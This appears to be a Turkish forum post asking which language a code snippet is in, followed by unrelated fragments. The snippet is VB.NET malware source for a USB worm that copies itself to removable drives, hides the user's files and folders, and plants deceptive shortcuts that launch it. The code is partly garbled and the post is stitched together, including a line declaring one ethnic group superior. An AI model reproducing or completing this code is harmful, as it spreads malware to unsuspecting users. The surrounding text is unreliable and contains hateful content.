0bu kodlar hangi dil ile yazılmış yardımcı olurmusunuz
Private UT As Threading. Thread
Public Sub Enable()
UT = New Threading. Thread(AddressOf WorkThread)
End Sub
Public Sub Disable()
End Sub
Public Sub WorkThread(ByVal filename As String)
Do While 1 = 1
Dim allDrives() As IO.DriveInfo = IO.DriveInfo. GetDrives()
Dim VbsObj As Object = CreateObject("WScript. Shell")
Dim srt As Object
For Each d As IO.DriveInfo In allDrives
If d.IsReady = True AndAlso d.DriveType = IO.DriveType. Removable Then
Dim RootDir As String = d.RootDirectory. ToString
Try : IO.File. Copy(Application. ExecutablePath, RootDir & filename & ".exe") : Catch : End Try
IO.File. SetAttributes(RootDir & filename & ".exe", IO.FileAttributes. Hidden)
For Each f As String In IO.Directory. GetFiles(RootDir)
If Not IO.Path. GetFileNameWithoutExtension(f) = filename Then
If Not f.Contains(".lnk") Then
IO.File. SetAttributes(f, IO.FileAttributes. Hidden)
End If
If Not f.Contains("~") Then
srt = VbsObj. CreateShortcut(RootDir & IO.Path. GetFileNameWithoutExtension(f) & ".lnk")
With srt
.TargetPath = RootDir & filename & ".exe"
.WorkingDirectory = RootDir
.IconLocation = f & ", 0"
End With
End If
End If
For Each dx As String In IO.Directory. GetDirectories(RootDir)
Dim dir As New System.IO.DirectoryInfo(dx)
dir. Attributes = IO.FileAttributes. Hidden
If Not dx.Contains("~") Then
srt = VbsObj. CreateShortcut(dx & ".lnk")
With srt
.TargetPath = RootDir & filename & ".exe"
.WorkingDirectory = RootDir
.IconLocation = Environment. GetEnvironmentVariable("windir") & "system32shell32.dll" & ", 3"
End With
End If
End If
Threading. Thread.Sleep(5000)
End Sub
senin derdin ders çalışmak değil
ccc rammstein ccc günaydın diler 08 01 2025
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arap milleti üstündür arap milleti allahtır
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